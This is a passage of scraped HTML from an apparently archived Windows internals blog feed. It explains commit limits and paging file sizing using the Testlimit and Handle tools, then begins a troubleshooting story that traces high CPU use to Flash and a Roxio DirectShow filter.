original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121076i736D0CADC6F6CFE6" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="316" /> </P> <H3> Committed Memory </H3> <P> Testlimit’s –r switch has it reserve virtual memory, but not actually <EM> commit </EM> it. Reserved virtual memory can’t actually store data or code, but applications sometimes use a reservation to create a large block of virtual memory and then commit it as needed to ensure that the committed memory is contiguous in the address space. When a process commits a region of virtual memory, the operating system guarantees that it can maintain all the data the process stores in the memory either in physical memory or on disk.&nbsp; That means that a process can run up against another limit: the <EM> commit limit </EM> . </P> <P> As you’d expect from the description of the commit guarantee, the commit limit is the sum of physical memory and the sizes of the paging files. In reality, not quite all of physical memory counts toward the commit limit since the operating system reserves part of physical memory for its own use. The amount of committed virtual memory for all the active processes, called the <EM> current commit charge </EM> , cannot exceed the system commit limit. When the commit limit is reached, virtual allocations that commit memory fail. That means that even a standard 32-bit process may get virtual memory allocation failures before it hits the 2GB address space limit. </P> <P> The current commit charge and commit limit is tracked by Process Explorer in its System Information window in the Commit Charge section and in the Commit History bar chart and graph: </P> <P> <IMG alt="image" border="0" height="80" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121077i05E449F13698BCF9" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="233" /> <IMG alt="image" border="0" height="120" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb_14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121078i7905D144B95B7DD5" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="180" /> </P> <P> Task Manager prior to Vista and Windows Server 2008 shows the current commit charge and limit similarly, but calls the current commit charge "PF Usage" in its graph: </P> <P> <IMG alt="image" border="0" height="244" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121079iF4CE470950C5B819" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="373" /> </P> <P> On Vista and Server 2008, Task Manager doesn't show the commit charge graph and labels the current commit charge and limit values with "Page File" (despite the fact that they will be non-zero values even if you have no paging file): </P> <P> <IMG alt="image" border="0" height="104" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121080iAB36A0FD4D0EA6B1" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="184" /> </P> <P> You can stress the commit limit by running Testlimit with the -m switch, which directs it to allocate committed memory. The 32-bit version of Testlimit may or may not hit its address space limit before hitting the commit limit, depending on the size of physical memory, the size of the paging files and the current commit charge when you run it. If you're running 32-bit Windows and want to see how the system behaves when you hit the commit limit, simply run multiple instances of Testlimit until one hits the commit limit before exhausting its address space. </P> <P> Note that, by default, the paging file is configured to grow, which means that the commit limit will grow when the commit charge nears it. And even when when the paging file hits its maximum size, Windows is holding back some memory and its internal tuning, as well as that of applications that cache data, might free up more. Testlimit anticipates this and when it reaches the commit limit, it sleeps for a few seconds and then tries to allocate more memory, repeating this indefinitely until you terminate it. </P> <P> If you run the 64-bit version of Testlimit, it will almost certainly will hit the commit limit before exhausting its address space, unless physical memory and the paging files sum to more than 8TB, which as described previously is the size of the 64-bit application-accessible address space. Here's the partial output of the 64-bit Testlimit&nbsp; running on my 8GB system (I specified an allocation size of 100MB to make it leak more quickly): </P> <P> <IMG alt="image" border="0" height="301" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121081i1D7B313945B52D88" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> And here's the commit history graph with steps when Testlimit paused to allow the paging file to grow: </P> <P> <IMG alt="image" border="0" height="131" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121082i405569647D36C893" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="249" /> </P> <P> When system virtual memory runs low, applications may fail and you might get strange error messages when attempting routine operations. In most cases, though, Windows will be able present you the low-memory resolution dialog, like it did for me when I ran this test: </P> <P> <IMG alt="image" border="0" height="252" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image30_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121083i0ACA1CE63DD39ABD" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="324" /> </P> <P> After you exit Testlimit, the commit limit will likely drop again when the memory manager truncates the tail of the paging file that it created to accommodate Testlimit's extreme commit requests. Here, Process Explorer shows that the current limit is well below the peak that was achieved when Testlimit was running: </P> <P> <IMG alt="image" border="0" height="121" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121084i585A56AFA56B9E47" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="181" /> </P> <H3> Process Committed Memory </H3> <P> Because the commit limit is a global resource whose consumption can lead to poor performance, application failures and even system failure, a natural question is 'how much are processes contributing the commit charge'? To answer that question accurately, you need to understand the different types of virtual memory that an application can allocate. </P> <P> Not all the virtual memory that a process allocates counts toward the commit limit. As you've seen, reserved virtual memory doesn't. Virtual memory that represents a file on disk, called a file mapping view, also doesn't count toward the limit unless the application asks for copy-on-write semantics, because Windows can discard any data associated with the view from physical memory and then retrieve it from the file. The virtual memory in Testlimit's address space where its executable and system DLL images are mapped therefore don't count toward the commit limit. There are two types of process virtual memory that do count toward the commit limit: private and pagefile-backed. </P> <P> Private virtual memory is the kind that underlies the garbage collector heap, native heap and language allocators. It's called private because by definition it can't be shared between processes. For that reason, it's easy to attribute to a process and Windows tracks its usage with the Private Bytes performance counter. Process Explorer displays a process private bytes usage in the Private Bytes column, in the Virtual Memory section of the Performance page of the process properties dialog, and displays it in graphical form on the Performance Graph page of the process properties dialog. Here's what Testlimit64 looked like when it hit the commit limit: </P> <P> <IMG alt="image" border="0" height="327" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121085i8FE38E8546FED78A" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="230" /> </P> <P> <IMG alt="image" border="0" height="136" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121086iEF0483C499F8D55C" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="471" /> </P> <P> Pagefile-backed virtual memory is harder to attribute, because it can be shared between processes. In fact, there's no process-specific counter you can look at to see how much a process has allocated or is referencing. When you run Testlimit with the -s switch, it allocates pagefile-backed virtual memory until it hits the commit limit, but even after consuming over 29GB of commit, the virtual memory statistics for the process don't provide any indication that it's the one responsible: </P> <P> <IMG alt="image" border="0" height="133" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121087i27039B3A7C02690D" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="205" /> </P> <P> For that reason, I added the -l switch to Handle a while ago. A process must open a pagefile-backed virtual memory object, called a section, for it to create a mapping of pagefile-backed virtual memory in its address space. While Windows preserves existing virtual memory even if an application closes the handle to the section that it was made from, most applications keep the handle open.&nbsp; The -l switch prints the size of the allocation for pagefile-backed sections that processes have open. Here's partial output for the handles open by Testlimit after it has run with the -s switch: </P> <P> <IMG alt="image" border="0" height="234" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121088iF0C88A6560AC02E0" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="394" /> </P> <P> You can see that Testlimit is allocating pagefile-backed memory in 1MB blocks and if you summed the size of all the sections it had opened, you'd see that it was at least one of the processes contributing large amounts to the commit charge. </P> <H3> How Big Should I Make the Paging File? </H3> <P> Perhaps one of the most commonly asked questions related to virtual memory is, how big should I make the paging file? There’s no end of ridiculous advice out on the web and in the newsstand magazines that cover Windows, and even Microsoft has published misleading recommendations. Almost all the suggestions are based on multiplying RAM size by some factor, with common values being 1.2, 1.5 and 2. Now that you understand the role that the paging file plays in defining a system’s commit limit and how processes contribute to the commit charge, you’re well positioned to see how useless such formulas truly are. </P> <P> Since the commit limit sets an upper bound on how much private and pagefile-backed virtual memory can be allocated concurrently by running processes, the only way to reasonably size the paging file is to know the maximum total commit charge for the programs you like to have running at the same time. If the commit limit is smaller than that number, your programs won’t be able to allocate the virtual memory they want and will fail to run properly. </P> <P> So how do you know how much commit charge your workloads require? You might have noticed in the screenshots that Windows tracks that number and Process Explorer shows it: Peak Commit Charge. To optimally size your paging file you should start all the applications you run at the same time, load typical data sets, and then note the commit charge peak (or look at this value after a period of time where you know maximum load was attained). Set the paging file minimum to be that value minus the amount of RAM in your system (if the value is negative, pick a minimum size to permit the kind of crash dump you are configured for). If you want to have some breathing room for potentially large commit demands, set the maximum to double that number. </P> <P> Some feel having no paging file results in better performance, but in general, having a paging file means Windows can write pages on the modified list (which represent pages that aren’t being accessed actively but have not been saved to disk) out to the paging file, thus making that memory available for more useful purposes (processes or file cache). So while there may be some workloads that perform better with no paging file, in general having one will mean more usable memory being available to the system (never mind that Windows won’t be able to write kernel crash dumps without a paging file sized large enough to hold them). </P> <P> Paging file configuration is in the System properties, which you can get to by typing “sysdm.cpl” into the Run dialog, clicking on the Advanced tab, clicking on the Performance Options button, clicking on the Advanced tab (this is <EM> really </EM> advanced), and then clicking on the Change button: </P> <P> <IMG alt="image" border="0" height="302" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121089iAD3AF1E9CF11880D" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="550" /> </P> <P> You’ll notice that the default configuration is for Windows to automatically manage the page file size. When that option is set on Windows XP and Server 2003,&nbsp; Windows creates a single paging file that’s minimum size is 1.5 times RAM if RAM is less than 1GB, and RAM if it's greater than 1GB, and that has a maximum size that's three times RAM. On Windows Vista and Server 2008, the minimum is intended to be large enough to hold a kernel-memory crash dump and is RAM plus 300MB or 1GB, whichever is larger. The maximum is either three times the size of RAM or 4GB, whichever is larger. That explains why the peak commit on my 8GB 64-bit system that’s visible in one of the screenshots is 32GB. I guess whoever wrote that code got their guidance from one of those magazines I mentioned! </P> <P> A couple of final limits related to virtual memory are the maximum size and number of paging files supported by Windows. 32-bit Windows has a maximum paging file size of 16TB (4GB if you for some reason run in non-PAE mode) and 64-bit Windows can having paging files that are up to 16TB in size on x64 and 32TB on IA64. Windows 8 ARM’s maximum paging file size is is 4GB. For all versions, Windows supports up to 16 paging files, where each must be on a separate volume. </P> <TABLE border="1" cellpadding="0" cellspacing="0" width="539"> <TBODY> <TR> <TD valign="top" width="118"> <P> <B> Version </B> </P> </TD> <TD valign="top" width="97"> <P align="center"> <B> Limit on x86 w/o PAE </B> </P> </TD> <TD valign="top" width="91"> <P align="center"> <B> Limit on x86 w/PAE </B> </P> </TD> <TD valign="top" width="77"> <P align="center"> <B> Limit on ARM </B> </P> </TD> <TD valign="top" width="77"> <P align="center"> <B> Limit on x64 </B> </P> </TD> <TD valign="top" width="77"> <P align="center"> <B> Limit on IA64 </B> </P> </TD> </TR> <TR> <TD valign="top" width="118"> <P> Windows 7 </P> </TD> <TD valign="top" width="97"> <P align="center"> 4 GB </P> </TD> <TD valign="top" width="91"> <P align="center"> 16 TB </P> </TD> <TD valign="top" width="77"> <P align="center"> </P> </TD> <TD valign="top" width="77"> <P align="center"> 16 TB </P> </TD> <TD valign="top" width="77"> </TD> </TR> <TR> <TD valign="top" width="118"> <P> Windows 8 </P> </TD> <TD valign="top" width="97"> </TD> <TD valign="top" width="91"> <P align="center"> 16 TB </P> </TD> <TD valign="top" width="77"> <P align="center"> 4 GB </P> </TD> <TD valign="top" width="77"> <P align="center"> 16 TB </P> </TD> <TD valign="top" width="77"> </TD> </TR> <TR> <TD valign="top" width="118"> <P> Windows Server 2008 R2 </P> </TD> <TD valign="top" width="97"> </TD> <TD valign="top" width="91"> </TD> <TD valign="top" width="77"> <P align="center"> </P> </TD> <TD valign="top" width="77"> <P align="center"> 16 TB </P> </TD> <TD valign="top" width="77"> <P align="center"> 32 TB </P> </TD> </TR> <TR> <TD valign="top" width="118"> <P> Windows Server 2012 </P> </TD> <TD valign="top" width="97"> </TD> <TD valign="top" width="91"> </TD> <TD valign="top" width="77"> </TD> <TD valign="top" width="77"> <P align="center"> 16 TB </P> </TD> <TD valign="top" width="77"> </TD> </TR> </TBODY> </TABLE> </BODY></HTML> Thu, 27 Jun 2019 06:47:11 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-virtual-memory/ba-p/723750 MarkRussinovich 2019-06-27T06:47:11Z The Case of the Slooooow System https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-slooooow-system/ba-p/723708 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Sep 22, 2008 </STRONG> <BR /> <P> A few weeks ago my wife complained that her Vista desktop was not responding to her typing or mouse clicks. Given the importance of the customer, I immediately sat down at the system to troubleshoot.&nbsp; It wasn’t completely hung, but extremely sluggish. For example, the mouse moved and when I clicked on the start button the start menu opened after about 30 seconds. I suspected that something was hogging the CPU and likely could have resolved the problem simply by logging off or rebooting, but knew that if I didn’t determine the root cause and address it, she’d likely be calling on my technical support services again in the near future. In any case, stooping to that kind of troubleshooting hack is beneath my dignity. I therefore set out to investigate. </P> <BR /> <P> My first step was to run <A href="#" mce_href="#" target="_blank"> Process Explorer </A> to see which process was using the CPU. After a few minutes Process Explorer finally appeared and showed that not one, but two processes were involved, each consuming 50% of the CPU: Iexplore.exe and Dllhost.exe. Iexplore is Internet Explorer (IE) and I suspected that IE itself wasn’t the problem, but that it was a browser helper object (BHO), ActiveX control, or some other plugin loaded into IE. Similarly, Dllhost.exe is the host process for out-of-process COM server DLLs, so it was probably not at fault, but the COM server loaded into it. Both required digging deeper and I decided to tackle IE first. </P> <BR /> <P> In order to try and get some CPU headroom in which to operate, I suspended the Dllhost process by selecting it in Process Explorer, right-clicking to open the process context menu, and selecting the Suspend entry: </P> <BR /> <P> <IMG alt="image" border="0" height="250" mce_src="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_16.png" original-url="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_16.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121050i43B010A8DEE208B7" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="325" /> </P> <BR /> <P> That put the Dllhost process to sleep and, as I expected, that freed up 50% of the CPU. That’s because the computer was a dual-core system and so to consume 100% of the available CPU cycles a process would have to have two threads, each hogging one of the cores. Most bugs I've seen that result in the CPU being pegged are caused by a single thread. </P> <BR /> <P> Processes don’t execute code, threads do, so I needed to look inside the IE process to see what thread or threads were running. I double-clicked on Iexplore.exe in Process Explorer to open its process properties dialog and switched to the Threads page. Several threads were running, but one was dominating the CPU: </P> <BR /> <P> <IMG alt="image" border="0" height="109" mce_src="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_15.png" original-url="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_15.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121051i2D83A1100889D93A" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="441" /> </P> <BR /> <P> From past experience I knew that Ieframe.dll was part of IE, but to be sure I clicked on the modules button on the Threads tab of the Properties dialog and switched to the Details page of the resulting Shell properties dialog: </P> <BR /> <P> <IMG alt="image" border="0" height="249" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_9.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121052iC3E374B6430147EF" width="317" /> </P> <BR /> <P> The description didn't give me a clue as the thread's specific purpose, so I moved to the second clue about the thread, its start function. Because I had configured Process Explorer to retrieve symbols for Windows images from the Microsoft symbol server in Options-&gt;Configure Symbols, Process Explorer showed the name of the function where each thread began executing. Sometimes the DLL or function where a thread starts executing is enough to identify the thread’s purpose or the software causing a problem. In this case, the thread began in a function named CTablWindow::_TabWindowThreadProc. The function name hints that it’s the one in which the main thread of a tab starts running, but that still wasn’t enough to tell me why the thread was running so much; I needed to dig even deeper and look inside the thread to see <EM> where </EM> it was executing. </P> <BR /> <P> To look at what the thread was up to, I double-clicked on it in the Threads list to open the Thread Stack dialog, which shows the functions on the thread’s stack. A stack is essentially an execution history, where each function listed called the one above it on the list and the function at the top of the list is the one most recently executed by the thread at the time of Process Explorer looks at the stack. I scrolled through the list, looking for frames that referenced 3rd-party DLLs or Microsoft IE plugins, since they would be far more likely to have a bug than IE’s own code. Sure enough, I found frames pointing at a popular 3rd-party ActiveX control, Adobe Flash: </P> <BR /> <P> <IMG alt="image" border="0" height="232" mce_src="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_19.png" original-url="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_19.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121053iE0CBB150B91FE24D" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="372" /> </P> <BR /> <P> Just to be sure that I hadn’t happened to catch Flash running when a different component was using most of the CPU time, I closed and reopened the stack dialog several times, but all of them pointed at Flash. </P> <BR /> <P> The first thing I do when I suspect that some software is causing a problem is to check the vendor’s web site to make sure that I have the latest version. I opened the Process Explorer DLL view and looked at Flash.ocx’s version, went to Adobe’s site and looked at the version of the current Flash download, and they were the same. </P> <BR /> <P> I was at a dead end. I couldn’t know for sure if Flash had a bug or, more likely, there was a Flash application that had a bug, nor could I be sure that the problem wouldn’t recur. I tried to determine which site was hosting the Flash content by closing tabs one by one, but when I had close them all the thread was still running. </P> <BR /> <P> At this point the only options I had were to uninstall Flash and leave my wife with a degraded web experience, or terminate IE to stop the current CPU usage and hope that it wouldn’t happen again. I chose the latter and the case remains open. Since investigating this I’ve seen the same Flash behavior again on my wife’s system and on my own, so have been vigilantly watching the Adobe site for a new version just in case its due to a bug in Flash itself. I was disappointed that there was no actionable result of the investigation, but at least I knew what had caused the CPU usage. </P> <BR /> <P> I now turned my attention the Dllhost problem with the hope that I'd meet with better success. Process Explorer lists in a tooltip the component or components loaded into hosting processes like Svchost.exe (the Windows service host process), Rundll32 (the Control Panel applet hosting process), Taskeng.exe (the scheduled task hosting process on Vista and Server 2008), and Dllhost.exe. I moved the mouse over Dllhost.exe to see what COM server it was running: </P> <BR /> <P> <IMG alt="image" border="0" height="198" mce_src="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_21.png" original-url="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_21.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121054i2FD950CB2B2016B2" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="468" /> </P> <BR /> <P> It was running the Thumbnail Cache COM server, whose job it is to create Explorer thumbnails for image and media files. It is part of Windows, so once again I had to look inside the process for more clues. I resumed the Dllhost process I had suspended earlier and opened the process properties threads page: </P> <BR /> <P> <IMG alt="image" border="0" height="165" mce_src="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_23.png" original-url="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_23.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121055iF8EF9A3286215B57" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="582" /> </P> <BR /> <P> The thread consuming the most CPU in this case started in Quartz.dll’s ObjectThread function. I looked at its properties and saw that it was another Windows DLL, the DirectShow Runtime, with a generic function name: </P> <BR /> <P> <IMG alt="image" border="0" height="237" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_10.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_10.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121056i6201AB4EF2CD2D75" width="314" /> </P> <BR /> <P> Next, I double-clicked to look at the thread stack: </P> <BR /> <P> <IMG alt="image" border="0" height="322" mce_src="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_24.png" original-url="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_24.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121057i983885666C470344" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="382" /> </P> <BR /> <P> The first few frames were in User32.dll and Ntdll.dll, core Windows system DLLs, but frames 4-7 are in the Sonicmp4demux.ax (".ax" is an extension commonly used for DirectShow filters), a 3rd-party component. The function names for those frames were the same and didn't make sense because the Microsoft symbol server only stores symbols for software included in Windows. Several more stack snapshots confirmed that it was the code causing the CPU usage. </P> <BR /> <P> Now that I had my suspect, the next step was to check for a newer version. But first I had to figure out what software the DLL came with, which was harder than it seemed. I opened the DLL view to take a closer look at the version information, but the description didn't reveal anything: </P> <BR /> <P> <IMG alt="image" border="0" height="208" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image5_thumb.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image5_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121058iFD9F5BAF4610A3C3" style="BORDER-RIGHT-WIDTH: 0px; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" width="451" /> </P> <BR /> <P> There were no folders in the Start menu or items in the Add/Remove Programs list with Sonic in the name. I Windows-Live-searched (I expect that word to be added to Webster's any day now) for Sonic and found that it's part of the Roxio's CD and DVD authoring software suites. I looked in the start menu and sure enough, found a Roxio folder: </P> <BR /> <P> <IMG alt="image" border="0" height="70" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_2.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121059i84B6494264DF88D5" style="BORDER-RIGHT-WIDTH: 0px; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" width="215" /> </P> <BR /> <P> I ran the Roxio software to check its version number and discovered that the Creator application includes a built-in facility to check for updates. I ran it, but it came up empty: </P> <BR /> <P> <IMG alt="image" border="0" height="114" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_3.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121060iD28E4706750906C1" style="BORDER-RIGHT-WIDTH: 0px; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" width="427" /> </P> <BR /> <P> I checked the Roxio web site just to be sure and it turned out there was a newer version that the built-in updater hadn't offered, perhaps because the update, according to the page, didn't offer anything new: </P> <BR /> <P> <IMG alt="image" border="0" height="242" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image19_thumb.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image19_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121061iC14C53EC16ECD362" style="BORDER-RIGHT-WIDTH: 0px; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" width="637" /> </P> <BR /> <P> I downloaded it anyway (all 640MB of it!) and waited the 15 or so minutes for it to install. Then I checked the version information of Sonicmp4demux.ax to see if it was newer, but its version number, 1.4.402.60802, was the same as the one I'd seen in the DLL view and the file was two years old: </P> <BR /> <P> <IMG alt="image" border="0" height="140" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_5.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121062iBAE4BA47DE2C4B9D" style="BORDER-RIGHT-WIDTH: 0px; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" width="494" /> </P> <BR /> <P> I could have uninstalled the software, which would ensure that the problem wouldn't return, but I wanted to keep Roxio for its DVD authoring functionality. I didn't care if I didn't get thumbnails for Roxio-specific image formats - I wasn't even sure there were any I'd ever see in Explorer - so I set out to see if I could disable just the Sonic demultiplexer. I could have searched the Registry for the DLL name, which is surely where it was registered, but that's a brute-force approach and if there were indirect or multiple references I could easily end up disabling more than just its thumbnail generation and possibly breaking something in Windows. </P> <BR /> <P> <A href="#" mce_href="#" target="_blank"> Process Monitor </A> was the perfect tool for the job. Because I didn't know when the problem might reoccur - it might takes days to reproduce - I didn't want to just run it and let it consume all available virtual memory or disk space, so I set the History Depth in the Options menu to have Process Monitor retain only the most recent 1 million events: </P> <BR /> <P> <IMG alt="image" border="0" height="133" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_7.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121063i6564B5E374FD2BB1" style="BORDER-RIGHT-WIDTH: 0px; 